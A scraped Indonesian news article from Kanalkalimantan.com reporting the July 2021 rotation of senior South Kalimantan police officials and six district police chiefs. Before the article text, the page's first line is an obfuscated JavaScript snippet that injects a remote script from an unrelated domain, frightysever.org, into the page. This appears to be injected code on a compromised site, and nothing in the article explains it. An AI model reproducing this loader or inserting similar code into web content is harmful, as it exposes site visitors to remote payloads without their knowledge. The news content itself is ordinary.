(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Sejumlah Pejabat Utama dan 6 Kapolres Jajaran Polda Kalsel Bergeser Posisi


KANALKALIMANTAN.COM, BANJARMASIN– Sejumlah pejabat utama Polda Kalsel dan enam Kapolres menjalani mutasi tugas. Pergeseran posisi ini menindaklanjuti turunnya Telegram Kapolri No ST/1508/VII/KEP/2021 pada Senin (26/7/2021).

Kabid Humas Polda Kalsel Kombes Mochamad Rifa’i kepada media membenarkan adanya mutasi berdasarkan telegram Kapolri tersebut.

“Pergeseran ini hal biasa yang terjadi di organisasi Polri agar ada penyegaran. Dan tidak hanya di Kalsel, tapi juga tempat lain,” katanya.

Dari informasi yang dihimpun Kanalkalimantan.com, di antara pejabat utama yang bergeser adalah Inspektur Pengawasan Daerah (Irwasda) Polda Kalsel Kombes Heri Armanto Sutikno yang kini menempati posisi baru sebagai Pamen Baintelkam Polri.

 

 

Baca juga: 23 Ribu Keluarga di Banjarmasin Terima Bansos Rp 600 Ribu dan 10 Kg Beras Saat PPKM Level 4

Posisi Irwasda selanjutnya akan diisi oleh pejabat baru yakni Kombes Turman Sormin Siregar yang sebelumnya menjabat Direktur Reskrimum Polda Sulsel.

Di sisi lain, Auditor Kepolisian Madya TK III Itwasda Polda Kalsel yang sebelumnya dijabat Kombes Pontjo Soediantoko, akan ditempati Kombes Pol Budi Prasetyo yang sebelumnya merupakan Kabagstandar Rowabprof Divpropam Polri. Sedangkan Kombes Pontjo akan menempati jabatan baru sebagai Karo Ops Polda Kepulauan Bangka Belitung (Babel).

Pergeseran juga terjadi untuk Kepala Rumkit TK III Bhayangkara Banjarmasin AKBP dr Bambang Pitoyo Nugroho yang akan menempati pos baru sebagai Kabid Dokkes Polda Papua Barat. Sedangkan posisi Kepala Rumkit TK III Bhayangkara Banjarmasin saat ini masih kosong.

Sementara itu, enam Kapolres yang bergeser berdasarkan Telegram Kapolri adalah Kapolres Tanah Laut AKBP Cuncun Kurniadi yang kini menempati jabatan baru sebagai Irbid Itwasda Polda Kalsel. Posisi yang ditinggalkan akan diisi AKBP Rofikoh Yunianto yang sebelumnya menjabat Kasubdit I Ditreskrimum Polda Jatim.

Demikian juga dengan Kapolres Banjar AKBP Andri Koko Prabowo akan menempati posisi baru sebagai Kepala Bagada Rolog Polda Kalsel. Jabatannya Kapolres Banjar diisi AKBP Doni Hadi Santoso yang sebelumnya Kapolres Banjarbaru.

Posisi Kapolres Banjarbaru selanjutnya akan dijabat AKBP Nur Khamid yang sebelumnya memimpin Polres Balangan. Sedangkan sebagai Kapolres Balangan diisi AKBP Zaenal Arifin yang sebelumnya menjabat menjabat Kasubbidpenmas Bidang Humas Polda Kalsel.

Baca juga: Rekor, Hari ini Sebanyak 436 Orang di Kalteng Positif Covid-19

Kapolres Tabalong yang sebelumnya dijabat AKBP Muchamat Muchdori akan menempati posisi baru sebagai Kabagrbp Rorena Polda Kalsel. Sebagai Kapolres Tabalong yang baru, diisi oleh AKBP Riza Muttaqin yang sebelumnya sebagai Kasubdit Gakkum Ditpolairud Polda Kalsel.

Untuk Kapolres Hulu Sungai Selatan (HSS) yang sebelumnya dijabat AKBP Siswoyo, kini menjabat sebagai Kabagkerma Roops Polda Kalsel. Posisinya digantikan AKBP Sugeng Priyanto yang sebelumnya menjabat Kasubbidprovos Bidpropam Polda Kalsel.

Wakil Direktur Reskrimum Polda Kalsel yang sebelumnya kosong kini dijabat AKBP Temmangnganro Machmud, yang sebelumnya Kapolres Kepulauan Selayar Polda Sulsel.(Kanalkalimantan.com/kk)

Reporter: kk
Editor: cell


Risa

Recent Posts

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

6 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

9 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

10 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

12 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

12 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

12 jam ago

This website uses cookies.